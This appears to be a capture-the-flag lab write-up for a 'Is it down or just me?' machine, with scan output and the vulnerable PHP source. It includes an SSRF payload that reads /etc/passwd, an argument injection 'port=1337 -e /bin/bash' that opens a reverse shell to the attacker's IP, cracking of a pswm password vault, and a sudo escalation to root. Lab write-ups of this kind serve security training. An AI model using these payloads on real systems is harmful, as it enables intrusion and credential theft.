Extended version of [[Info]] from what was taken in the video # Victim IP ``` 10.129.39.124 ``` # Attacker IP ``` 10.10.14.191 ``` # Nmap [[Nmap]] ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 f6:cc:21:7c:ca:da:ed:34:fd:04:ef:e6:f9:4c:dd:f8 (ECDSA) |_ 256 fa:06:1f:f4:bf:8c:e3:b0:c8:40:21:0d:57:06:dd:11 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Is it down or just me? |_http-server-header: Apache/2.4.52 (Ubuntu) 3190/tcp filtered csvr-proxy 3329/tcp filtered hp-device-disc 4285/tcp filtered vrml-multi-use 4680/tcp filtered mgemanagement 4967/tcp filtered unknown 6336/tcp filtered unknown 7753/tcp filtered unknown 8999/tcp filtered bctp 10362/tcp filtered unknown 11051/tcp filtered unknown 11600/tcp filtered tempest-port 11903/tcp filtered unknown 12708/tcp filtered unknown 13199/tcp filtered unknown 15078/tcp filtered unknown 16140/tcp filtered unknown 17153/tcp filtered unknown 17609/tcp filtered unknown 25119/tcp filtered unknown 34475/tcp filtered unknown 35375/tcp filtered unknown 39696/tcp filtered unknown 40259/tcp filtered unknown 41464/tcp filtered unknown 44320/tcp filtered unknown 46811/tcp filtered unknown 49334/tcp filtered unknown 51690/tcp filtered unknown 54014/tcp filtered unknown 54250/tcp filtered unknown 59865/tcp filtered unknown 61349/tcp filtered unknown 62024/tcp filtered unknown 63662/tcp filtered unknown 65417/tcp filtered unknown Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. Initiating NSE at 16:30 Completed NSE at 16:30, 0.00s elapsed Initiating NSE at 16:30 Completed NSE at 16:30, 0.00s elapsed Initiating NSE at 16:30 Completed NSE at 16:30, 0.00s elapsed Read data files from: /usr/share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 590.06 seconds Raw packets sent: 72586 (3.194MB) | Rcvd: 70925 (2.889MB) ``` does not have internet connection but can use http / https addresses have SSRF attack running in burpsuite tried other forms such as file:// but got an error about to run gobuster for directery / file enum # Gobuster [[Gobuster]] ``` =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.129.39.124 [+] Method: GET [+] Threads: 100 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /javascript (Status: 301) [Size: 319] [--> http://10.129.39.124/javascript/] /index.php (Status: 200) [Size: 739] /server-status (Status: 403) [Size: 278] Progress: 47937 / 60000 (79.89%)[ERROR] parse "http://10.129.39.124/error\x1f_log": net/url: invalid control character in URL [ERROR] parse "http://10.129.39.124/error\x1f_log.php": net/url: invalid control character in URL Progress: 59998 / 60000 (100.00%) =============================================================== Finished =============================================================== ``` nothing of interest by requesting ``` http://+file%3a///etc/passwd ``` as the url parameter in the post request we can get the output of /etc/passwd where we discover the user `aleks` login shell is `/bin/bash` Was able to disclose index.php by requesting `http:// file:///var/www/html/index.php` url encoded ofc and got this source code back after html decoding it ```php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Is it down or just me?</title> <link rel="stylesheet" href="style.css"> </head> <body> <header> <img src="/logo.png" alt="Logo"> <h2>Is it down or just me?</h2> </header> <div class="container"> <?php if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) { echo '<h1>Is the port refused, or is it just you?</h1> <form id="urlForm" action="index.php?expertmode=tcp" method="POST"> <input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br> <input type="number" id="port" name="port" placeholder="Please enter a port number." required><br> <button type="submit">Is it refused?</button> </form>'; } else { echo '<h1>Is that website down, or is it just you?</h1> <form id="urlForm" action="index.php" method="POST"> <input type="url" id="url" name="url" placeholder="Please enter a URL." required><br> <button type="submit">Is it down?</button> </form>'; } if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) { $ip = trim($_POST['ip']); $valid_ip = filter_var($ip, FILTER_VALIDATE_IP); $port = trim($_POST['port']); $port_int = intval($port); $valid_port = filter_var($port_int, FILTER_VALIDATE_INT); if ( $valid_ip && $valid_port ) { $rc = 255; $output = ''; $ec = escapeshellcmd("/usr/bin/nc -vz $ip $port"); exec($ec . " 2>&1",$output,$rc); echo '<div class="output" id="outputSection">'; if ( $rc === 0 ) { echo "<font size=+1>It is up. It's just you! 😝</font><br><br>"; echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>'; } else { echo "<font size=+1>It is down for everyone! 😔</font><br><br>"; echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>'; } } else { echo '<div class="output" id="outputSection">'; echo '<font color=red size=+1>Please specify a correct IP and a port between 1 and 65535.</font>'; } } elseif (isset($_POST['url'])) { $url = trim($_POST['url']); if ( preg_match('|^https?://|',$url) ) { $rc = 255; $output = ''; $ec = escapeshellcmd("/usr/bin/curl -s $url"); exec($ec . " 2>&1",$output,$rc); echo '<div class="output" id="outputSection">'; if ( $rc === 0 ) { echo "<font size=+1>It is up. It's just you! 😝</font><br><br>"; echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>'; } else { echo "<font size=+1>It is down for everyone! 😔</font><br><br>"; } } else { echo '<div class="output" id="outputSection">'; echo '<font color=red size=+1>Only protocols http or https allowed.</font>'; } } ?> </div> </div> <footer>© 2024 isitdownorjustme LLC</footer> </body> </html> ``` ```php <?php if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) { echo '<h1>Is the port refused, or is it just you?</h1> <form id="urlForm" action="index.php?expertmode=tcp" method="POST"> <input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br> <input type="number" id="port" name="port" placeholder="Please enter a port number." required><br> <button type="submit">Is it refused?</button> </form>'; } else { echo '<h1>Is that website down, or is it just you?</h1> <form id="urlForm" action="index.php" method="POST"> <input type="url" id="url" name="url" placeholder="Please enter a URL." required><br> <button type="submit">Is it down?</button> </form>'; } ``` stands out as it's looking for a get parameter of expertmode with the value of tcp to show a new form bypassed filter on expertmode to get reverse shell using [[Burpsuite]] ``` ip=10.10.14.191&port=1337 -e /bin/bash ``` and using a [[netcat|nc]] we can get a reverseshell We can upgrade the shell using [[upgrade shell|Upgrade Shell]] Using the new shell we can run `whoami` or `id` to confirm we are running as the `www-data` user where we see the user flag in the directory we get a shell in we have read access to some of the user `aleks` home folder in `/home/aleks` where we find the file `pswm` in `/home/aleks/.local/share/pswm` where some googling review `pswm` is a python password manager and googling `pswm-bruteforce` gives us the github repository [pswm-decryptor](https://github.com/seriotonctf/pswm-decryptor) where we had to use [[pip]] to install a dependency of `cryptocode` and then change the file it was looking to a file in caden64's case `pswm` or in daves case `pswm2` and ran the script to get the password of `flower` which also gave us 'aleks' password where we were able to switch users and check what sudo permissions we had to notice we had permissions to run any command as root we can run ```bash sudo su ``` to switch to the root user and claim the root flag in `/root`